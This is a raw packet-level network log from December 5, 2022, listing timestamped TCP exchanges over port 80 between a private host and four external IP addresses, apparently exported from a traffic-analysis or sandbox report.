                                                                                                                                                                          Dec 5, 2022 15:18:21.895226002 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.895435095 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.895613909 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.947578907 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.947662115 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.947705030 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.947818041 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.947997093 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.948215008 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.948441029 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.948534966 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.948596001 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.948700905 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:21.948877096 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.949338913 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.949817896 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:21.949872971 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:22.002010107 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:22.002072096 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:22.002583027 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:22.002646923 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:22.002754927 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:22.064001083 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:22.064080954 CET804990345.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:22.064306021 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:22.844649076 CET4990380192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:23.860560894 CET4990480192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:23.919157028 CET804990445.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:23.919471979 CET4990480192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:23.919549942 CET4990480192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:23.978204012 CET804990445.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:24.014523983 CET804990445.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:24.014605045 CET804990445.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:24.014997005 CET4990480192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:24.014997959 CET4990480192.168.11.2045.130.41.24
                                                                                                                                                                          Dec 5, 2022 15:18:24.073695898 CET804990445.130.41.24192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:29.031056881 CET4990580192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:29.316747904 CET8049905154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:29.317125082 CET4990580192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:29.317260981 CET4990580192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:29.601957083 CET8049905154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:29.653853893 CET8049905154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:29.653898001 CET8049905154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:29.654310942 CET4990580192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:29.896816015 CET8049905154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:29.896938086 CET4990580192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:29.993065119 CET8049905154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:30.327625990 CET4990580192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:31.355473042 CET4990680192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:31.637928963 CET8049906154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:31.638343096 CET4990680192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:31.638446093 CET4990680192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:31.920799971 CET8049906154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:31.972896099 CET8049906154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:31.972959995 CET8049906154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:31.973249912 CET4990680192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:32.200808048 CET8049906154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:32.201096058 CET4990680192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:32.296747923 CET8049906154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:32.639336109 CET4990680192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:33.655118942 CET4990780192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:33.936516047 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:33.936770916 CET4990780192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:33.937452078 CET4990780192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:34.218391895 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.218451023 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.218492985 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.218924999 CET4990780192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:34.219079971 CET4990780192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:34.219260931 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.219315052 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.219358921 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.219398022 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.219435930 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.219474077 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.219513893 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.219621897 CET4990780192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:34.219805002 CET4990780192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:34.219916105 CET4990780192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:34.500536919 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.500610113 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.500659943 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.500705004 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.500750065 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.500794888 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.500839949 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.500874043 CET4990780192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:34.500890017 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.501000881 CET4990780192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:34.501173019 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.501244068 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.501291990 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.501339912 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.501384974 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.501430035 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.501475096 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.501521111 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.501566887 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.501611948 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.501657009 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.501703024 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.782413960 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.782490015 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.782540083 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.783183098 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.783256054 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.783305883 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.783350945 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.783396006 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.783440113 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.783484936 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.783531904 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.863331079 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.863395929 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:34.863612890 CET4990780192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:34.951478004 CET4990780192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:35.112493992 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:35.112895966 CET4990780192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:35.144383907 CET8049907154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:35.144768953 CET4990780192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:35.967032909 CET4990880192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:36.248979092 CET8049908154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:36.249269962 CET4990880192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:36.249335051 CET4990880192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:36.530189991 CET8049908154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:36.535110950 CET8049908154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:36.535191059 CET8049908154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:36.535691023 CET4990880192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:36.535691977 CET4990880192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:36.775965929 CET8049908154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:36.776241064 CET4990880192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:18:36.817034960 CET8049908154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:41.544168949 CET4990980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:41.658185005 CET8049909192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:41.658561945 CET4990980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:41.658643007 CET4990980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:41.772448063 CET8049909192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:41.956681013 CET8049909192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:41.956757069 CET8049909192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:41.956813097 CET8049909192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:41.956868887 CET8049909192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:41.956923962 CET8049909192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:41.956979036 CET8049909192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:41.957031965 CET8049909192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:41.957061052 CET4990980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:41.957084894 CET8049909192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:41.957140923 CET8049909192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:41.957190037 CET4990980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:41.957199097 CET8049909192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:41.957357883 CET4990980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:41.957357883 CET4990980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:41.957526922 CET4990980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:42.071060896 CET8049909192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:42.121606112 CET4990980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:42.668543100 CET4990980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:43.683984995 CET4991080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:43.798019886 CET8049910192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:43.798346043 CET4991080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:43.798408985 CET4991080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:43.912497997 CET8049910192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:44.077199936 CET8049910192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:44.077249050 CET8049910192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:44.077284098 CET8049910192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:44.077317953 CET8049910192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:44.077349901 CET8049910192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:44.077383041 CET8049910192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:44.077419043 CET8049910192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:44.077452898 CET8049910192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:44.077486038 CET8049910192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:44.077511072 CET4991080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:44.077519894 CET8049910192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:44.077565908 CET4991080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:44.077565908 CET4991080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:44.077656984 CET4991080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:44.191595078 CET8049910192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:44.246216059 CET4991080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:44.808587074 CET4991080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:45.824382067 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:45.939038992 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:45.939415932 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:45.939966917 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:45.940052986 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:46.054173946 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.054238081 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.054279089 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.054318905 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.054359913 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.054399967 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.054440975 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.054480076 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.054518938 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.054534912 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:46.054661036 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:46.054738045 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:46.168791056 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.168867111 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.168916941 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.168963909 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.169011116 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.169056892 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.169112921 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:46.169142008 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.169214964 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:46.169233084 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.169292927 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.169296026 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:46.169342041 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.169533014 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.169807911 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.211025953 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.283647060 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.283729076 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.283787012 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.283840895 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.284138918 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.284214020 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.442459106 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.442534924 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.442594051 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.442651033 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.442707062 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.442739964 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:46.442763090 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.442820072 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.442874908 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.442929983 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.442972898 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:46.442986012 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.443113089 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:46.443183899 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:46.556859016 CET8049911192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:46.605088949 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:46.948908091 CET4991180192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:47.964379072 CET4991280192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:48.078207970 CET8049912192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:48.078502893 CET4991280192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:48.078620911 CET4991280192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:48.192413092 CET8049912192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:48.318914890 CET8049912192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:48.370196104 CET4991280192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:58.328794956 CET8049912192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:18:58.329157114 CET4991280192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:58.329247952 CET4991280192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:18:58.443082094 CET8049912192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:03.336780071 CET4992080192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:03.501787901 CET804992038.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:03.502260923 CET4992080192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:03.502260923 CET4992080192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:03.667408943 CET804992038.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:03.709583998 CET804992038.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:03.709597111 CET804992038.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:03.709723949 CET4992080192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:04.507337093 CET4992080192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:05.523384094 CET4992180192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:05.686527014 CET804992138.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:05.686753035 CET4992180192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:05.686863899 CET4992180192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:05.850004911 CET804992138.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:05.887490988 CET804992138.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:05.887579918 CET804992138.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:05.887940884 CET4992180192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:06.694431067 CET4992180192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:07.710534096 CET4992280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:07.875540972 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:07.875848055 CET4992280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:07.876416922 CET4992280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:07.876516104 CET4992280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:08.041676044 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.041779995 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.041830063 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.041874886 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.041935921 CET4992280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:08.041949034 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.041997910 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.042043924 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.042119980 CET4992280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:08.042258978 CET4992280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:08.207113028 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.207204103 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.207281113 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.207328081 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.207382917 CET4992280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:08.207400084 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.207448959 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.207518101 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.207565069 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.207562923 CET4992280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:08.207653999 CET4992280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:08.207817078 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.207878113 CET4992280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:19:08.207907915 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.207956076 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.208026886 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.208070993 CET804992238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:19:08.208241940 CET804992238.55.15.214192.168.11.20
